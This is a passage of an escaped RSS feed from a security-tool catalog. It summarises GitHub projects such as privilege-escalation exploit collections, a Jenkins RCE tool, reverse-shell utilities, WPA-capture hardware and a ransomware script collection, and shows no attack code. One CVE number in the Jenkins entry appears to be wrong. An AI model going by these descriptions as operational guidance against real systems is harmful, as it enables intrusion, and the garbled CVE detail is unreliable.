&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="privacysexy--privacy-is-sexy"&gt;privacy.sexy — Privacy is sexy&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;Enforce privacy &amp;amp; security best-practices on Windows, macOS and Linux, because privacy is sexy.&lt;/p&gt;</description></item><item><title>PrivEsc</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-privesc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-privesc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PrivEsc is a collection of privilege escalation scripts and exploits designed for Windows, Linux, and MySQL environments. Its primary use case is to help security professionals identify and exploit privilege escalation vulnerabilities in various systems. Notable features include compatibility with multiple operating systems and exploitation capabilities tailored for common service vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="privesc-by-1n3crowdshield"&gt;PrivEsc by 1N3@CrowdShield&lt;/h1&gt;
&lt;p&gt;&lt;a href="http://crowdshield.com"&gt;http://crowdshield.com&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="about"&gt;ABOUT:&lt;/h2&gt;
&lt;p&gt;A collection of Windows, Linux and MySQL privilege escalation scripts and exploits.&lt;/p&gt;</description></item><item><title>PrivescCheck</title><link>https://rainmana.github.io/hackyfeed/tools/itm4n-privesccheck/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/itm4n-privesccheck/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PrivescCheck is a PowerShell script designed for identifying common Windows vulnerabilities and configuration issues outside the scope of public security standards, facilitating exploitation and post-exploitation tasks. It allows users to run various checks—including basic, extended, and audit checks—generate human-readable reports in multiple formats (TXT, HTML, CSV, XML), and includes options for silent execution and risky checks, making it suitable for penetration testing, research, and auditing purposes. Notably, the tool performs context-aware access control checks to provide accurate findings based on the current user&amp;rsquo;s privileges.&lt;/p&gt;</description></item><item><title>Privilege-Escalation</title><link>https://rainmana.github.io/hackyfeed/tools/ignitetechnologies-privilege-escalation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ignitetechnologies-privilege-escalation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Privilege Escalation is a comprehensive cheat sheet and reference guide tailored for penetration testers, CTF participants, and cybersecurity students, focusing on methods to escalate privileges in compromised systems. This tool includes a wealth of exploitation techniques, such as abusing sudo rights, exploiting SUID bits, and identifying vulnerable Docker instances, alongside detailed enumeration and exploitation methods. Notable features include practical examples, links to external resources, and an organized structure for efficient referencing in both educational and professional penetration testing scenarios.&lt;/p&gt;</description></item><item><title>project-restoration</title><link>https://rainmana.github.io/hackyfeed/tools/leoetlino-project-restoration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/leoetlino-project-restoration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Project Restoration is a patch for &lt;em&gt;Majora&amp;rsquo;s Mask 3D&lt;/em&gt; that reintroduces mechanics from the original game while resolving gameplay issues to enhance player experience. Notable features include an improved swimming mechanic for Zora Link, adjustments to the Inverted Song of Time&amp;rsquo;s effect, and modifications to the Twinmold battle for clarity and pacing. The project aims to blend the best aspects of the original game with the enhanced graphics of the remaster, ensuring a polished gameplay experience without game-breaking issues.&lt;/p&gt;</description></item><item><title>protobuf-inspector</title><link>https://rainmana.github.io/hackyfeed/tools/mildsunrise-protobuf-inspector/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mildsunrise-protobuf-inspector/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; protobuf-inspector is a command-line tool designed to parse Google Protobuf encoded blobs (versions 2 and 3) without requiring their corresponding definitions. It outputs a structured representation of the blob&amp;rsquo;s content, including inferred types and potential parsing errors, making it useful for developers working with Protobuf data or engaging in reverse-engineering tasks. Notable features include the ability to detect structure dynamically, handle embedded messages, and support raw data extraction for in-depth analysis.&lt;/p&gt;</description></item><item><title>prowler</title><link>https://rainmana.github.io/hackyfeed/tools/prowler-cloud-prowler/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/prowler-cloud-prowler/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Prowler is an open-source cloud security platform that automates security assessments and compliance checks across various cloud environments. It features hundreds of customizable security checks and integration capabilities, enabling organizations to implement real-time monitoring and remediation for enhanced cloud security. Designed for scalability and cost-effectiveness, Prowler simplifies the complexities of cloud security management for organizations of all sizes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img align="center" src="https://github.com/prowler-cloud/prowler/blob/master/docs/img/prowler-logo-black.png#gh-light-mode-only" width="50%" height="50%"&gt;
 &lt;img align="center" src="https://github.com/prowler-cloud/prowler/blob/master/docs/img/prowler-logo-white.png#gh-dark-mode-only" width="50%" height="50%"&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;b&gt;&lt;i&gt;Prowler&lt;/b&gt; is the Open Cloud Security platform trusted by thousands to automate security and compliance in any cloud environment. With hundreds of ready-to-use checks and compliance frameworks, Prowler delivers real-time, customizable monitoring and seamless integrations, making cloud security simple, scalable, and cost-effective for organizations of any size.
&lt;/p&gt;</description></item><item><title>PS2Recomp</title><link>https://rainmana.github.io/hackyfeed/tools/ran-j-ps2recomp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ran-j-ps2recomp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PS2Recomp is an experimental static recompiler for PlayStation 2 ELF binaries that translates MIPS R5900 instructions into C++ code. Its primary use case involves recompiling and executing PS2 games while allowing configuration for stubs, skips, and instruction patches. Notable features include customizable syscall handling, support for PS2-specific macros, and integration with Ghidra for efficient function export and mapping.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="ps2recomp-playstation-2-static-recompiler-experimental"&gt;PS2Recomp: PlayStation 2 Static Recompiler (Experimental)&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://discord.gg/JQ8mawxUEf"&gt;&lt;img src="https://img.shields.io/badge/Discord-Join%20Server-5865F2?logo=discord&amp;amp;logoColor=white" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Also check our &lt;a href="https://github.com/ran-j/PS2Recomp/wiki"&gt;WIKI&lt;/a&gt;&lt;/p&gt;</description></item><item><title>PsMapExec</title><link>https://rainmana.github.io/hackyfeed/tools/the-viper-one-psmapexec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/the-viper-one-psmapexec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PsMapExec is a PowerShell-based post-exploitation framework designed to facilitate penetration testing within Active Directory environments. It offers enhancements over similar tools like CrackMapExec and NetExec, allowing for comprehensive Active Directory enumeration and management with a user-friendly interface. The tool is self-contained, making it suitable for use in restricted environments, and emphasizes adherence to ethical guidelines and consent when utilized for security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="psmapexec"&gt;PsMapExec&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;img src="https://github.com/user-attachments/assets/e471dc70-a4a1-4c5d-8c81-2a67a2927b3a" 
 width="450" 
 alt="PME_Logo"
 style="border:1px solid #ddd; border-radius:8px; box-shadow:2px 2px 10px rgba(0,0,0,0.1);"&gt;
&lt;/p&gt;</description></item><item><title>pspy</title><link>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-pspy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dominicbreuker-pspy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pspy is an unprivileged Linux process monitoring tool that allows users to observe commands executed by other processes, including cron jobs, in real-time without requiring root access. It leverages procfs scans and inotify filesystem watchers to detect short-lived processes and can be particularly useful for system enumeration in Capture The Flag (CTF) challenges, as well as for demonstrating secure coding practices regarding command-line argument handling. Notable features include customizable process and filesystem event monitoring, with options for output formatting and scan intervals.&lt;/p&gt;</description></item><item><title>psudohash</title><link>https://rainmana.github.io/hackyfeed/tools/t3l3machus-psudohash/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/t3l3machus-psudohash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Psudohash is a customizable password list generator designed for orchestrating brute force attacks and cracking hashes by mimicking human password creation patterns. Key features include in-order and all-order combinations of keyword permutations, leet character substitution, common padding value additions, and filtering options based on word length, making it particularly effective for pentesting corporate environments where standard naming conventions are often used in passwords.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="psudohash"&gt;psudohash&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/python-3.x-yellow.svg" alt="Python 3.x"&gt;&lt;/a&gt; &lt;a href="https://github.com/t3l3machus/psudohash/blob/main/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-red.svg" alt="License"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/badge/Maintained%3F-Yes-23a82c"&gt;
&lt;img src="https://img.shields.io/badge/Developed%20on-kali%20linux-blueviolet"&gt;&lt;/p&gt;
&lt;h2 id="cool-new-features-of-v110"&gt;Cool New Features of v1.1.0&lt;/h2&gt;
&lt;p&gt;Special thanks to &lt;a href="https://github.com/DavidAngelos"&gt;DavidAngelos&lt;/a&gt;:&lt;br&gt;
▶️ Added a progress bar in every step to track execution.&lt;br&gt;
▶️ Added options:&lt;/p&gt;</description></item><item><title>pwn_jenkins</title><link>https://rainmana.github.io/hackyfeed/tools/gquere-pwn_jenkins/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gquere-pwn_jenkins/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwn_jenkins is a tool designed for exploiting various remote code execution vulnerabilities within Jenkins instances, specifically targeting misconfigurations and outdated versions. It enables authenticated and unauthenticated access to sensitive files, allows for arbitrary command execution via deserialization exploits, and identifies authentication bypass issues through crafted requests. Notable features include support for multiple CVEs, including CVE-2014-23897 and CVE-2019-1003002, making it a comprehensive toolkit for assessing the security of Jenkins environments.&lt;/p&gt;</description></item><item><title>pwnagotchi</title><link>https://rainmana.github.io/hackyfeed/tools/jayofelony-pwnagotchi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jayofelony-pwnagotchi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwnagotchi is a Raspberry Pi-based tool designed for capturing WPA key material from Wi-Fi networks using passive and active techniques, generating PCAP files compatible with hashcat for cracking. Notable features include the ability to perform full and half WPA handshake captures, utilize PMKID attacks, and facilitate communication between multiple Pwnagotchi units through a custom protocol. The tool has removed AI components to enhance stability and battery life during operation.&lt;/p&gt;</description></item><item><title>pwncat</title><link>https://rainmana.github.io/hackyfeed/tools/cytopia-pwncat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cytopia-pwncat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwncat is a powerful networking tool that enhances the capabilities of traditional netcat by incorporating advanced features such as evasion techniques for firewalls and intrusion detection/prevention systems, along with support for both bind and reverse shells. Its self-injecting shell functionality and extensive scripting support using Python make it particularly effective for penetration testing and exploitation scenarios. Notably, it facilitates seamless port forwarding and maintains a user-friendly interface for enhanced usability in complex network environments.&lt;/p&gt;</description></item><item><title>pwndbg</title><link>https://rainmana.github.io/hackyfeed/tools/pwndbg-pwndbg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pwndbg-pwndbg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pwndbg is a Python module designed as a plugin for GDB and LLDB, enhancing the debugging experience for developers working on low-level software, reverse engineering, and exploit development. Its primary use case is to streamline common debugging tasks by providing user-friendly features and a suite of utilities that address the shortcomings of vanilla GDB and LLDB. Notable features include an improved hexdump command, a clean interface for quick navigation, and a range of custom tools to facilitate debugging across different platforms and architectures.&lt;/p&gt;</description></item><item><title>pwnedOrNot</title><link>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-pwnedornot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-pwnedornot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pwnedOrNot is an OSINT tool designed to check if email accounts have been compromised and retrieve associated passwords from public data dumps. It leverages the HaveIBeenPwned v3 API for initial breach verification and subsequently searches for compromised passwords. Key features include detailed breach information, the ability to filter results by domain, and support for batch processing of multiple email addresses.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;&lt;img src="https://i.imgur.com/ojjMbWX.jpg"&gt;&lt;/p&gt;
&lt;h4 align="center"&gt;OSINT Tool for Finding Passwords of Compromised Email Accounts&lt;/h4&gt;
&lt;p align="center"&gt;
 Created by Lohitya Pushkar (thewhiteh4t).&lt;br&gt;
 &lt;a href="https://x.com/thewhiteh4t"&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/a&gt;
 &lt;span&gt; - &lt;/span&gt;
 &lt;a href="https://thewhiteh4t.github.io"&gt;&lt;b&gt;Blog&lt;/b&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>pwninit</title><link>https://rainmana.github.io/hackyfeed/tools/io12-pwninit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/io12-pwninit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pwninit is a tool designed to automate the setup for binary exploitation challenges by preparing the necessary executables and library files. Key features include the ability to set the challenge binary as executable, download an appropriate linker and debug symbols, patch the binary using patchelf, and generate a customizable pwntools solve script. This streamlines the initial configuration process for security professionals and students engaging in binary exploitation tasks.&lt;/p&gt;</description></item><item><title>PyArmor-Unpacker</title><link>https://rainmana.github.io/hackyfeed/tools/svenskithesource-pyarmor-unpacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/svenskithesource-pyarmor-unpacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PyArmor-Unpacker is a tool designed to unpack Python applications protected by PyArmor, specifically targeting versions prior to v8. The tool offers three methods for unpacking, with the preferred method being suitable for Python 3.9, allowing users to retrieve the original code from obfuscated &lt;code&gt;.pyc&lt;/code&gt; files. Notable features include a detailed usage guide, support for multiple unpacking methods, and an emphasis on community contributions to address known issues and enhance functionality.&lt;/p&gt;</description></item><item><title>pygod</title><link>https://rainmana.github.io/hackyfeed/tools/pygod-team-pygod/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pygod-team-pygod/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PyGOD is a Python library designed for graph outlier detection, enabling users to identify anomalies in various structures such as social networks and security systems. It offers over ten detection algorithms, maintains a unified API for ease of use, and supports multiple levels of outlier detection (node, edge, and graph-level) while being compatible with PyTorch Geometric. Key features include scalable design for large graph processing, comprehensive documentation, and streamlined data handling with PyG data objects.&lt;/p&gt;</description></item><item><title>pyinstxtractor</title><link>https://rainmana.github.io/hackyfeed/tools/extremecoders-re-pyinstxtractor/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/extremecoders-re-pyinstxtractor/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PyInstaller Extractor is a Python script designed to extract the contents of executables created with PyInstaller, including fixed headers for bytecode decompilation. It supports a wide range of PyInstaller versions and can handle both Windows and Linux binaries, enabling users to recover files from packaged applications efficiently. Notable features include seamless integration with Python 2.x and 3.x environments, as well as compatibility with various bytecode decompilers for further analysis.&lt;/p&gt;</description></item><item><title>pylingual</title><link>https://rainmana.github.io/hackyfeed/tools/syssec-utd-pylingual/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/syssec-utd-pylingual/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PyLingual is a Python bytecode decompiler specifically designed for versions 3.6 and later, allowing users to convert Python bytecode back into source code. Notable features include the ability to run locally or through a web service, support for different Python versions via pyenv, and adjustable options for decompilation settings, such as output directory and segmentation preferences. This tool is optimized for readability and extensibility, though it may initially exhibit some control flow accuracy regressions compared to its web service counterpart.&lt;/p&gt;</description></item><item><title>pypush</title><link>https://rainmana.github.io/hackyfeed/tools/jjtech0130-pypush/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jjtech0130-pypush/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;pypush&lt;/code&gt; is an evolving library designed for interfacing with Apple&amp;rsquo;s internal API, specifically focusing on the client side of the Apple Push Notification service (APNs). Its primary use case is to enable applications to impersonate Apple devices and receive push notifications while facilitating reverse-engineering efforts related to iMessage and other APIs. Notable features include platform independence and a planned expansion to include a wider range of Apple&amp;rsquo;s API functionalities as development progresses.&lt;/p&gt;</description></item><item><title>pythem</title><link>https://rainmana.github.io/hackyfeed/tools/m4n3dw0lf-pythem/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4n3dw0lf-pythem/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pythem is a versatile penetration testing framework written in Python, designed for use by security researchers and professionals to conduct various security assessments within legal boundaries. Notable features include support for attacks such as ARP spoofing, DNS manipulation, brute force attacks on SSH and web forms, as well as tools for exploit development and packet filtering. The framework can be installed on Debian-based Linux distributions, or run as a Docker container, facilitating accessibility and ease of deployment.&lt;/p&gt;</description></item><item><title>QBDI</title><link>https://rainmana.github.io/hackyfeed/tools/qbdi-qbdi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qbdi-qbdi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; QBDI is a modular dynamic binary instrumentation (DBI) framework designed for cross-platform and cross-architecture use, supporting various operating systems including Linux, macOS, Android, iOS, and Windows. It provides C/C++ APIs along with Python and JavaScript bindings, facilitating scripting while integrating seamlessly with external injection tools like Frida. Notable features include the ability to instrument binaries without a preferred injection method and an LD_PRELOAD-based injector for dynamic executables on Linux and macOS, although it currently does not support multithreading or C++ exception handling.&lt;/p&gt;</description></item><item><title>QP-Gallery-Releases</title><link>https://rainmana.github.io/hackyfeed/tools/wstxda-qp-gallery-releases/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wstxda-qp-gallery-releases/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; QuickPic Gallery Mod is a modernized version of the classic QuickPic Gallery application, designed for Android platforms with API level 23 and above. This tool emphasizes speed, stability, and simplicity, featuring multiple bug fixes, enhanced compatibility with recent Android versions, and a refreshed Material 3 design while maintaining its lightweight and offline-first experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="quickpic-gallery-mod"&gt;QuickPic Gallery Mod&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.android.com"&gt;&lt;img src="https://img.shields.io/badge/android-platform?style=for-the-badge&amp;amp;label=platform&amp;amp;labelColor=21262d&amp;amp;color=6e7681" alt="Platform"&gt;&lt;/a&gt; &lt;a href="https://developer.android.com/studio/releases/platforms"&gt;&lt;img src="https://img.shields.io/badge/23%2B-level?style=for-the-badge&amp;amp;logo=android&amp;amp;logoColor=3cd382&amp;amp;label=API&amp;amp;labelColor=21262d&amp;amp;color=ff663b" alt="API"&gt;&lt;/a&gt; &lt;a href="https://github.com/WSTxda/QP-Gallery-Releases/releases/latest"&gt;&lt;img src="https://img.shields.io/github/v/release/WSTxda/QP-Gallery-Releases?display_name=tag&amp;amp;style=for-the-badge&amp;amp;logo=github&amp;amp;labelColor=21262d&amp;amp;color=1f6feb" alt="Release"&gt;&lt;/a&gt; &lt;a href="https://github.com/WSTxda/QP-Gallery-Releases/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/WSTxda/QP-Gallery-Releases/total?style=for-the-badge&amp;amp;labelColor=21262d&amp;amp;color=238636" alt="Downloads"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://raw.githubusercontent.com/WSTxda/QP-Gallery-Releases/master/Images/Banner.svg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;A modernized version of the classic QuickPic Gallery, focused on speed, stability, and simplicity.
It includes multiple bug fixes, improved compatibility with recent Android versions, and a refreshed Material 3 design — while preserving the lightweight, fast, and offline-first experience of the original app.&lt;/p&gt;</description></item><item><title>Qu1cksc0pe</title><link>https://rainmana.github.io/hackyfeed/tools/cyb3rmx-qu1cksc0pe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cyb3rmx-qu1cksc0pe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Qu1cksc0pe is a comprehensive malware analysis tool designed to analyze various file types, including Windows executables, Linux binaries, Android APKs, and email files, utilizing both static and dynamic analysis methods. It provides detailed insights such as DLL usage, API functions, embedded executables, and MITRE ATT&amp;amp;CK mappings, facilitating in-depth evaluation of potentially malicious files. The tool also features a user-friendly web interface and robust error handling to enhance usability, especially within different operating system environments.&lt;/p&gt;</description></item><item><title>quark-engine</title><link>https://rainmana.github.io/hackyfeed/tools/ev-flow-quark-engine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ev-flow-quark-engine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Quark Engine is a comprehensive tool designed for malware family analysis and vulnerability assessment, particularly in the context of Android malware. Its primary use case involves identifying and reporting on various malware behaviors and signatures, enabling security researchers to assess risks and improve defenses. Notable features include detailed analysis reports, a rule-based scoring system for malware, and compatibility with Python 3.10, making it accessible for developers and cybersecurity professionals.&lt;/p&gt;</description></item><item><title>Raccoon</title><link>https://rainmana.github.io/hackyfeed/tools/evyatarmeged-raccoon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/evyatarmeged-raccoon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Raccoon is an offensive security tool designed for reconnaissance and information gathering, offering a wide range of features like DNS enumeration, WHOIS lookup, TLS data analysis, port scanning, and directory fuzzing. With support for asynchronous scanning via Python&amp;rsquo;s asyncio and anonymity through Tor/proxies, it provides efficient and robust scanning capabilities while organizing outputs by target and scan type. Additionally, it leverages default wordlists from SecLists for various reconnaissance tasks, enhancing its operational effectiveness.&lt;/p&gt;</description></item><item><title>radare2-book</title><link>https://rainmana.github.io/hackyfeed/tools/radareorg-radare2-book/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/radareorg-radare2-book/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The r2book is a collaboratively maintained documentation resource for the Radare2 reverse engineering framework, serving as an updated version of the original radare1 book. Its primary use case is to provide users with comprehensive information and guidance on utilizing Radare2 effectively, while notable features include community contributions for continuous content improvement and online accessibility.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="r2book"&gt;r2book&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/radareorg/radare2-book/actions/workflows/mdbook.yml"&gt;&lt;img src="https://github.com/radareorg/radare2-book/actions/workflows/mdbook.yml/badge.svg" alt="mdbook"&gt;&lt;/a&gt;
&lt;a href="https://github.com/radareorg/radare2-book/actions/workflows/ci.yml"&gt;&lt;img src="https://github.com/radareorg/radare2-book/actions/workflows/ci.yml/badge.svg" alt="CI document uploads"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This book is an updated version maintained by the community of the original radare1 book written by pancake.&lt;/p&gt;</description></item><item><title>RamiGPT</title><link>https://rainmana.github.io/hackyfeed/tools/m507-ramigpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m507-ramigpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RamiGPT is an AI-driven offensive security tool that facilitates privilege escalation to root accounts using OpenAI&amp;rsquo;s technology and PwnTools. Its primary use case involves quickly exploiting vulnerabilities across various systems, achieving root access in under a minute, as demonstrated by its performance on multiple VulnHub scenarios. The tool features a user-friendly GUI and seamless integration with Docker for easy deployment and configuration, leveraging tools like BeRoot and LinPEAS for effective enumeration.&lt;/p&gt;</description></item><item><title>randar-explanation</title><link>https://rainmana.github.io/hackyfeed/tools/spawnmason-randar-explanation/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/spawnmason-randar-explanation/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Randar is a Minecraft exploit targeting versions Beta 1.8 to 1.12.2 that uses LLL lattice reduction to manipulate the game&amp;rsquo;s random number generator, &lt;code&gt;java.util.Random&lt;/code&gt;, allowing attackers to derive the precise coordinates of other players&amp;rsquo; locations based on item drop positions from mined blocks. The exploit hinges on a vulnerability in the game&amp;rsquo;s code, where improper reuse of RNG instances can be exploited to track players across vast distances, making it particularly significant on anarchic servers like 2b2t, where player anonymity and location security are critical. Notable features include the ability to reverse-engineer the RNG state to pinpoint player coordinates efficiently and the reliance on advanced mathematical techniques to achieve this.&lt;/p&gt;</description></item><item><title>Ransomware</title><link>https://rainmana.github.io/hackyfeed/tools/err0r-ica-ransomware/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/err0r-ica-ransomware/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ransomware collection repository provides a suite of ransomware scripts designed for educational and testing purposes. Users are cautioned against executing these scripts on their devices due to their malicious nature. Key features include compatibility with multiple operating systems such as Termux, Kali Linux, Ubuntu, and others, thereby making it a versatile tool for research and development in cybersecurity contexts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://i.postimg.cc/qJwVsmT0/OIG3-3.jpg" alt="logo"&gt;&lt;/p&gt;
&lt;h1 id="-ransomwares-collection-"&gt;☣️ Ransomwares Collection ☣️&lt;/h1&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-diff" data-lang="diff"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;- Don&amp;#39;t Run Them on Your Device.
